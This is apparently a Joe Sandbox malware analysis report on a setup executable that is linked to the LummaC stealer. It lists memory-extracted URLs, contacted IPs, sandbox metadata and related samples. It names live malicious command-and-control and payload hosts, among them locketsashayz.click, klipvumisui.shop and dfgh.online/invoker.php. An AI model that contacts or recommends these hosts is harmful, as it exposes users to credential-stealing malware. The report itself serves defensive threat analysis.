http://crl.usertr	EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	false		high
http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0	#Setup.exe, 00000000.00000003.2422345792.0000000000760000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	false		high
https://cegu.shop/	#Setup.exe, 00000000.00000003.2422345792.0000000000797000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2434984342.0000000000797000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://locketsashayz.click/ts	#Setup.exe, 00000000.00000002.2439009480.000000000379C000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2288417455.00000000037A3000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2287908931.0000000003796000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2307693390.00000000037A3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.vikingcloud.com/TWGCA.crl0t	#Setup.exe, 00000000.00000003.2422345792.0000000000760000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	false		high
https://klipvumisui.shop/int_clp_sha.txtrrF1Kye	#Setup.exe, 00000000.00000003.2422345792.0000000000760000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2434984342.0000000000766000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://certs.securetrust.com/CA05	#Setup.exe, 00000000.00000003.2422345792.0000000000760000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000005.00000002.2361342386.0000000004741000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.remobjects.com/ps	EZLBPQ4AXUTIKRAZAYNGFI8TD.exe, 00000007.00000003.2446954266.000000007FB1B000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe, 00000007.00000003.2436592602.000000000321F000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000000.2452326416.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000000.2477869264.0000000000D0D000.00000020.00000001.01000000.0000000C.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp.10.dr	false		high
https://locketsashayz.click/api=u	#Setup.exe, 00000000.00000002.2439009480.000000000379C000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2288417455.00000000037A3000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2287908931.0000000003796000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2307693390.00000000037A3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000005.00000002.2374022259.00000000057AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.innosetup.com/	EZLBPQ4AXUTIKRAZAYNGFI8TD.exe, 00000007.00000003.2446954266.000000007FB1B000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe, 00000007.00000003.2436592602.000000000321F000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000000.2452326416.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000000.2477869264.0000000000D0D000.00000020.00000001.01000000.0000000C.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp.10.dr	false		high
https://certs.securetrust.com/CA0	#Setup.exe, 00000000.00000003.2422345792.0000000000760000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	false		high
https://dfgh.online/invoker.php?compname=	powershell.exe, 00000005.00000002.2360776155.0000000000B90000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.autohotkey.comCould	BrightLib.exe, 00000026.00000002.2955581758.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000026.00000000.2908320125.000000000049A000.00000002.00000001.01000000.0000000E.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000005.00000002.2361342386.0000000004741000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.certum.pl/CPS0	EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2457734373.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.innosetup.com/	#Setup.exe	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000005.00000002.2361342386.0000000004896000.00000004.00000800.00020000.00000000.sdmp	false		high
https://klipvumisui.shop/int_clp_sha.txtL	#Setup.exe, 00000000.00000003.2422345792.0000000000797000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2434984342.0000000000797000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.certum.pl/ctnca.crl0k	EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2457734373.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000005.00000002.2361342386.0000000004896000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000005.00000002.2361342386.0000000004F38000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000005.00000002.2374022259.00000000057AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	#Setup.exe, 00000000.00000003.2225810362.00000000037DF000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2225888215.00000000037DC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	#Setup.exe, 00000000.00000003.2250320709.00000000037EC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	#Setup.exe, 00000000.00000003.2250320709.00000000037EC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.autohotkey.com	BrightLib.exe, 00000026.00000002.2955581758.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000026.00000000.2908320125.000000000049A000.00000002.00000001.01000000.0000000E.sdmp	false		high
https://locketsashayz.click/apiZ9NjAAA=~	#Setup.exe, 00000000.00000003.2248628442.00000000037D0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://locketsashayz.click/	#Setup.exe, 00000000.00000003.2237198959.0000000003799000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2306796493.0000000000719000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2268384150.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2248628442.000000000379B000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2268324810.000000000379D000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2237282717.00000000037A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	#Setup.exe, 00000000.00000003.2225810362.00000000037DF000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2225979808.00000000037DE000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2225888215.00000000037DC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	#Setup.exe, 00000000.00000003.2255904884.00000000038B7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000005.00000002.2361342386.0000000004896000.00000004.00000800.00020000.00000000.sdmp	false		high
http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0	#Setup.exe, 00000000.00000003.2422784890.000000000075F000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	false		high
http://crl.micro	powershell.exe, 00000005.00000002.2360275508.0000000000935000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2377053357.0000000006FD9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://klipvumisui.shop/=	#Setup.exe, 00000000.00000002.2434984342.00000000007A3000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2422345792.00000000007A3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://locketsashayz.click/apiK	#Setup.exe, 00000000.00000003.2268384150.00000000007A0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0	#Setup.exe, 00000000.00000003.2422345792.0000000000760000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	false		high
http://www.info-zip.org/	BrightLib.exe, 00000026.00000002.2981257670.000000003A069000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.securetrust.com/0?	#Setup.exe, 00000000.00000003.2422784890.000000000075F000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	false		high
https://locketsashayz.click/api.x	#Setup.exe, 00000000.00000003.2237198959.0000000003799000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2237282717.00000000037A5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://locketsashayz.click/i7	#Setup.exe, 00000000.00000003.2248737423.00000000007A0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://repository.certum.pl/cscasha2.cer0	EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2457734373.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2457734373.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	false		high
http://ocsp.vikingcloud.com/0A	#Setup.exe, 00000000.00000003.2422345792.0000000000760000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	false		high
https://locketsashayz.click/s	#Setup.exe, 00000000.00000002.2439009480.000000000379C000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2287908931.0000000003796000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://certs.securetrust.com/issuers/TWGCA.crt0	#Setup.exe, 00000000.00000003.2422345792.0000000000760000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	false		high
http://ocsp.vikingcloud.com/0:	#Setup.exe, 00000000.00000003.2422345792.0000000000760000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	false		high
https://contoso.com/License	powershell.exe, 00000005.00000002.2374022259.00000000057AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dfgh.online/invoker.php?compName=	powershell.exe, 00000005.00000002.2361342386.0000000004ADE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://locketsashayz.click/n	#Setup.exe, 00000000.00000003.2237198959.0000000003799000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2237282717.000000000379E000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2238526832.0000000003795000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	#Setup.exe, 00000000.00000003.2225810362.00000000037DF000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2225979808.00000000037DE000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2225888215.00000000037DC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://locketsashayz.click/apiZ9NjAAA=A	#Setup.exe, 00000000.00000003.2249715456.00000000037D0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://locketsashayz.click/i	#Setup.exe, 00000000.00000003.2287972610.00000000007A0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://locketsashayz.click/pi	#Setup.exe, 00000000.00000002.2439009480.000000000379C000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2287908931.0000000003796000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2248628442.000000000379B000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2268324810.000000000379D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://locketsashayz.click/apist	#Setup.exe, 00000000.00000003.2268384150.000000000078B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	#Setup.exe, 00000000.00000003.2250320709.00000000037EC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	#Setup.exe, 00000000.00000003.2250320709.00000000037EC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/Sectig	EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	#Setup.exe, 00000000.00000003.2225810362.00000000037DF000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2225979808.00000000037DE000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2225888215.00000000037DC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://subca.ocsp-certum.com01	EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2457734373.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000005.00000002.2374022259.00000000057AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0D	EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2457734373.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	false		high
https://dfgh.online	powershell.exe, 00000005.00000002.2361342386.0000000004896000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://jrsoftware.org0	EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2457734373.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	false		high
https://jrsoftware.org/	EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2457734373.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	false		high
https://cegu.shop/u	#Setup.exe, 00000000.00000003.2422345792.0000000000797000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2434984342.0000000000797000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.all	#Setup.exe, 00000000.00000003.2255904884.00000000038B7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.mozilla.or	#Setup.exe, 00000000.00000003.2252526923.00000000037E8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.trustwave.com/TWGCA.crl0n	#Setup.exe, 00000000.00000003.2422345792.0000000000760000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	false		high
https://dfgh.online/invoker.php?compName=user-PC	powershell.exe, 00000005.00000002.2361342386.0000000004896000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000005.00000002.2374022259.00000000057AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	false		high
http://repository.certum.pl/ctnca.cer09	EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2457734373.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	#Setup.exe, 00000000.00000003.2225810362.00000000037DF000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2225888215.00000000037DC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.securetrust.com/TWGCSCA_L1.crl0y	#Setup.exe, 00000000.00000003.2422784890.000000000075F000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	false		high
https://www.certum.pl/CPS0	EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2457734373.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	false		high
https://locketsashayz.click/apiGuN	#Setup.exe, 00000000.00000003.2268324810.000000000379D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.certum.pl/cscasha2.crl0q	EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	false		high
http://cscasha2.ocsp-certum.com04	EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2457734373.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	#Setup.exe, 00000000.00000003.2225810362.00000000037DF000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2225979808.00000000037DE000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2225888215.00000000037DC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2457734373.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2457734373.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	#Setup.exe, 00000000.00000003.2250320709.00000000037EC000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.37.128	klipvumisui.shop	United States	13335	CLOUDFLARENETUS	false
188.114.97.3	locketsashayz.click	European Union	13335	CLOUDFLARENETUS	true
185.161.251.21	cegu.shop	United Kingdom	5089	NTLGB	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582494
Start date and time:	2024-12-30 18:14:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	39
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	#Setup.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@59/13@4/3
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212, 20.12.23.50
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target BrightLib.exe, PID 1540 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 2356 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: #Setup.exe

Simulations

Behavior and APIs

Time	Type	Description
12:15:11	API Interceptor	10x Sleep call for process: #Setup.exe modified
12:15:25	API Interceptor	6x Sleep call for process: powershell.exe modified
12:16:21	API Interceptor	1x Sleep call for process: BrightLib.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.37.128	@Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse
	!Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	Full_Setup.exe	Get hash	malicious	LummaC Stealer	Browse
188.114.97.3	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.rgenerousrs.store/o362/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.beylikduzu616161.xyz/2nga/
	Delivery_Notification_00000260791.doc.js	Get hash	malicious	Unknown	Browse	radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
	ce.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/lxvbq
	Label_00000852555.doc.js	Get hash	malicious	Unknown	Browse	tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
	PO 20495088.exe	Get hash	malicious	FormBook	Browse	www.ssrnoremt-rise.sbs/3jsc/
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/zWkbOqX7/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	gusetup.exe	Get hash	malicious	Unknown	Browse	www.glarysoft.com/update/glary-utilities/pro/pro50/
	Online Interview Scheduling Form.lnk	Get hash	malicious	Ducktail	Browse	gmtagency.online/api/check

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cegu.shop	installer_1.05_36.5.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	@Setup.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	Winter.mp4.hta	Get hash	malicious	LummaC	Browse	185.161.251.21
	MdhO83N5Fm.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	!Setup.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	@Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Full_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
